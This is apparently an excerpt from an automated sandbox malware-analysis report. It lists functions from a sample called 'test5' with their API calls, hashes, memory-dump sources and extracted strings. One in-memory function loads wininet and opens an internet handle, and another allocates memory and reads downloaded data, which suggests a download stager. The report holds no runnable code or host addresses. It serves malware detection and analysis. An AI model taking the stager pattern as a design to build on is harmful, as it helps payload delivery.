Instruction ID: df1deff95c86ab7aa00d471e0c0ac2999ea2843c644e19bbef680b402b2e1c69
Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
Instruction Fuzzy Hash: 5331B43461CE588BD754DF2C98C87BABBD2FBE8325F51166EE88AC3191DB31C4818741

Function 0000021551B00101 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000021551B0011C
InternetOpenA.WININET(00000000,00000000), ref: 0000021551B00134

Strings

wini, xrefs: 0000021551B00105

Memory Dump Source

Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: wini
API String ID: 2559873147-1606035523
Opcode ID: 1105e58a2544bfd005ad153f036402a995691c8f86edb9c2bbaca55425401acd
Instruction ID: 938efce4ccb2bb453d4982f71750fc6a0bbaf189b78069c0c02988de63905332
Opcode Fuzzy Hash: 1105e58a2544bfd005ad153f036402a995691c8f86edb9c2bbaca55425401acd
Instruction Fuzzy Hash: E8F0557111D928A7E31D2E32580F3BA3AC6E7A2719F1591EFF183C24D2E9209C4280A3

Function 0000021551B00327 Relevance: 3.1, APIs: 2, Instructions: 88memoryfilenetworkCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0000021551B0037A
InternetReadFile.WININET(0000021551B00188,0000021551B00188), ref: 0000021551B00398

Memory Dump Source

Source File: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551b00000_test5.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 6b60ce9cb4e923b11b8257dbe61bc90d4fe4aa8c819b1d86596d13da368f0b41
Instruction ID: 2a29278c4ea0c5ff893ab067093d328f58c6ec02383b9d29fffcfac46b7aadee
Opcode Fuzzy Hash: 6b60ce9cb4e923b11b8257dbe61bc90d4fe4aa8c819b1d86596d13da368f0b41
Instruction Fuzzy Hash: AF21C03120884A1BE7168AA4E8923AB33D6DBA8354F34845DF45EC73C3DA28CC53C396

Function 006F2140 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

EnumCalendarInfoExW.KERNELBASE ref: 006F21E7

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID: CalendarEnumInfo
String ID:
API String ID: 2925833060-0
Opcode ID: 2525a88f381b6b1ecfbfb687c266decb66c4fc36e0a9b82aa819b4781aa7c3de
Instruction ID: cbde714a72bf50e094a220dc4e3e2a41d972f0a177013d8a09611fce45b144d1
Opcode Fuzzy Hash: 2525a88f381b6b1ecfbfb687c266decb66c4fc36e0a9b82aa819b4781aa7c3de
Instruction Fuzzy Hash: E3119136A00F85C1DB25DB1AE8613797371F748BE4F244226CFAD57BA4CB29E592CB04

Function 00000215537579EB Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0000021553757B38

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: d7734f9e29522b1c94f3834d7ef67b592fc59952bfb38ff70c6dc34e55ac2150
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: 40419870618B899FD794DB2CC48CB2AB7E2FBA8355F4009ADF489C7360D734D9818B42

Non-executed Functions

Function 00694793 Relevance: 45.6, Strings: 36, Instructions: 626COMMON

Download Yara Rule

Strings

.n, xrefs: 00694B96
`1n, xrefs: 0069527B
/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: bad incoming valuesresetspinning: not a spinning mruntime: profBuf already closedruntime: spl, xrefs: 00694E2C
/n, xrefs: 00694C4E
/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons, xrefs: 00694EFE
/n, xrefs: 00694DF6
/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] =, xrefs: 006948AE
/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer foun, xrefs: 00695550
/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a, xrefs: 006950FC
@1n, xrefs: 0069521A
@/n, xrefs: 00694CB5
1n, xrefs: 0069518B
/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not, xrefs: 00694B1E
/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep, xrefs: 00694915
/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:, xrefs: 006951EC
/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupte, xrefs: 006952AE
/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedpanic during preemptoffnanotime returning zerofatal: , xrefs: 0069497E
/gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 00694BB0
@0n, xrefs: 00694EC8
*n, xrefs: 006948DF
/sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:, xrefs: 006953EB
/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc inv, xrefs: 00694AB5
/gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime., xrefs: 00694D82
/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification, xrefs: 0069530F
`/n, xrefs: 00694D1C
`0n, xrefs: 00694F2F
2n, xrefs: 00695461
0n, xrefs: 006950C9
/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavaila, xrefs: 00694C84
/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:, xrefs: 006949E7
@3n, xrefs: 00695581
/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old, xrefs: 00694D36
/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase error, xrefs: 006947DE
/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal er, xrefs: 00695035
/memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro, xrefs: 0069509B
/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit, xrefs: 00694E93

Memory Dump Source

Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_test5.jbxd

Similarity

API ID:
String ID: /n$ 1n$ 2n$/gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] =$/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep$/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedpanic during preemptoffnanotime returning zerofatal: $/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:$/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks failedstack not a power of 2minpc or maxpc inv$/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not foundwinmm.dll not$/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavaila$/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old$/gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr frames elided..., locked to threadruntime.$/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase error$/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: bad incoming valuesresetspinning: not a spinning mruntime: profBuf already closedruntime: spl$/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedruntime: source value is too largeVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit$/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons$/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal er$/memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro$/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a$/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:$/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupte$/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification$/sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:$/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer foun$@/n$@0n$@1n$@3n$`/n$`0n$`1n$*n$.n$/n$0n
API String ID: 0-3924829288
Opcode ID: 75c677a2bcaddd2b3de46786a0d3c71e491cfd739726991b7ce706cfa695141e
Instruction ID: 5a911ab05df6a9a3b926dbd3dda3096a93134ba4cc30f6a609e4ff8c360c8723
Opcode Fuzzy Hash: 75c677a2bcaddd2b3de46786a0d3c71e491cfd739726991b7ce706cfa695141e
Instruction Fuzzy Hash: BC621676209B8585FF25CB15E8943AA73A6F388784F95C03ACA8E47B65EF7CC845C740

Function 0000021551C10E90 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 0000021551C0F454: _getptd.LIBCMT ref: 0000021551C0F46A
Part of subcall function 0000021551C0F454: __updatetlocinfo.LIBCMT ref: 0000021551C0F49F
Part of subcall function 0000021551C0F454: __updatetmbcinfo.LIBCMT ref: 0000021551C0F4C6

_errno.LIBCMT ref: 0000021551C10EF6

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_fileno.LIBCMT ref: 0000021551C10F23

Part of subcall function 0000021551C13914: _errno.LIBCMT ref: 0000021551C1391D
Part of subcall function 0000021551C13914: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C13928

write_multi_char.LIBCMT ref: 0000021551C1155F
write_string.LIBCMT ref: 0000021551C1157C
write_multi_char.LIBCMT ref: 0000021551C11599
write_string.LIBCMT ref: 0000021551C115F8
write_multi_char.LIBCMT ref: 0000021551C11651
free.LIBCMT ref: 0000021551C11665
_isleadbyte_l.LIBCMT ref: 0000021551C11736
write_char.LIBCMT ref: 0000021551C1174C
write_char.LIBCMT ref: 0000021551C1176D
_errno.LIBCMT ref: 0000021551C11870
_invalid_parameter_noinfo.LIBCMT ref: 0000021551C1187B

Strings

@, xrefs: 0000021551C10F0F
, xrefs: 0000021551C11533

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction ID: 6b5684cde5377eab6a37657ab1ce2392309429cec7f5f0b9ab63d39d72f93419
Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction Fuzzy Hash: D6621C309D8E69DAF7689A78C4C93F9BBD2FBF5700FA4459DD887C31C1D62AD8028641

Function 00000215537602D7 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 000002155375E89B: _getptd.LIBCMT ref: 000002155375E8B1
Part of subcall function 000002155375E89B: __updatetlocinfo.LIBCMT ref: 000002155375E8E6
Part of subcall function 000002155375E89B: __updatetmbcinfo.LIBCMT ref: 000002155375E90D

_errno.LIBCMT ref: 000002155376033D

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_fileno.LIBCMT ref: 000002155376036A

Part of subcall function 0000021553762D5B: _errno.LIBCMT ref: 0000021553762D64
Part of subcall function 0000021553762D5B: _invalid_parameter_noinfo.LIBCMT ref: 0000021553762D6F

write_multi_char.LIBCMT ref: 00000215537609A6
write_string.LIBCMT ref: 00000215537609C3
write_multi_char.LIBCMT ref: 00000215537609E0
write_string.LIBCMT ref: 0000021553760A3F
write_multi_char.LIBCMT ref: 0000021553760A98
free.LIBCMT ref: 0000021553760AAC
_isleadbyte_l.LIBCMT ref: 0000021553760B7D
write_char.LIBCMT ref: 0000021553760B93
write_char.LIBCMT ref: 0000021553760BB4
_errno.LIBCMT ref: 0000021553760CB7
_invalid_parameter_noinfo.LIBCMT ref: 0000021553760CC2

Strings

@, xrefs: 0000021553760356
, xrefs: 000002155376097A

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction ID: 20e6b867551da9b0770f36e4b23eb09bdde07dad698dc2f9129ce85a09d1406c
Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction Fuzzy Hash: C762CA30D2CE65DAF7AC9A1888693FB7BD2FBE5300FA4417DD48F831D2D6649E428641

Function 0000021551C103DC Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000021551C0F454: _getptd.LIBCMT ref: 0000021551C0F46A
Part of subcall function 0000021551C0F454: __updatetlocinfo.LIBCMT ref: 0000021551C0F49F
Part of subcall function 0000021551C0F454: __updatetmbcinfo.LIBCMT ref: 0000021551C0F4C6

_errno.LIBCMT ref: 0000021551C10442

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_fileno.LIBCMT ref: 0000021551C1046F

Part of subcall function 0000021551C13914: _errno.LIBCMT ref: 0000021551C1391D
Part of subcall function 0000021551C13914: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C13928

write_multi_char.LIBCMT ref: 0000021551C10A9F
write_string.LIBCMT ref: 0000021551C10ABC
write_multi_char.LIBCMT ref: 0000021551C10AD9
write_string.LIBCMT ref: 0000021551C10B38
write_multi_char.LIBCMT ref: 0000021551C10B91
free.LIBCMT ref: 0000021551C10BA5
_isleadbyte_l.LIBCMT ref: 0000021551C10C76
write_char.LIBCMT ref: 0000021551C10C8C
write_char.LIBCMT ref: 0000021551C10CAD
_errno.LIBCMT ref: 0000021551C10DA7
_invalid_parameter_noinfo.LIBCMT ref: 0000021551C10DB2

Strings

, xrefs: 0000021551C10A73

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction ID: 59d60c4cbb43e9bc84f943f104cba0502ff6121e71813c0f1f3dba9b9e3d4354
Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction Fuzzy Hash: E2623C309D8F69DAF7689A18C4D93F97BD2FBF5304FA4419DD887C31C2D626D8128682

Function 000002155375F823 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000002155375E89B: _getptd.LIBCMT ref: 000002155375E8B1
Part of subcall function 000002155375E89B: __updatetlocinfo.LIBCMT ref: 000002155375E8E6
Part of subcall function 000002155375E89B: __updatetmbcinfo.LIBCMT ref: 000002155375E90D

_errno.LIBCMT ref: 000002155375F889

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_fileno.LIBCMT ref: 000002155375F8B6

Part of subcall function 0000021553762D5B: _errno.LIBCMT ref: 0000021553762D64
Part of subcall function 0000021553762D5B: _invalid_parameter_noinfo.LIBCMT ref: 0000021553762D6F

write_multi_char.LIBCMT ref: 000002155375FEE6
write_string.LIBCMT ref: 000002155375FF03
write_multi_char.LIBCMT ref: 000002155375FF20
write_string.LIBCMT ref: 000002155375FF7F
write_multi_char.LIBCMT ref: 000002155375FFD8
free.LIBCMT ref: 000002155375FFEC
_isleadbyte_l.LIBCMT ref: 00000215537600BD
write_char.LIBCMT ref: 00000215537600D3
write_char.LIBCMT ref: 00000215537600F4
_errno.LIBCMT ref: 00000215537601EE
_invalid_parameter_noinfo.LIBCMT ref: 00000215537601F9

Strings

, xrefs: 000002155375FEBA

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction ID: c63bdaddcf91f926b6d98605d96b44f93101cf668e535d1d567a72bb3bdf30c9
Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction Fuzzy Hash: 79620C30D38E69DBF7AC9A5884593EB77D2FBF5300FA401ADD49FC31C2D6249A424692

Function 006979E0 Relevance: 15.7, Strings: 12, Instructions: 718COMMON

Download Yara Rule

Strings

MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, xrefs: 006985E5
non-concurrent sweep failed to drain all sweep queuesruntime: NtCancelWaitCompletionPacket failed; errno= exited a goroutine internally locked to the OS threadcompileCallback: argument size is larger than uintptrmin size of malloc header is not a size class bo, xrefs: 006987D8
&n, xrefs: 0069873F
gc %: gp *(in n= ) - NaN P m= MPC= < end > ]:???pc= G125625EOFintmapMayUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltcgodnsudpftpssh::1se, xrefs: 0069815A
MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=, xrefs: 006985A5
failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre, xrefs: 006987E9
, xrefs: 00697FCB
., xrefs: 006980DD
ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 00698525
gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=NtCreateWaitCompletionPacket, xrefs: 006987FA
ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACE, xrefs: 006982ED
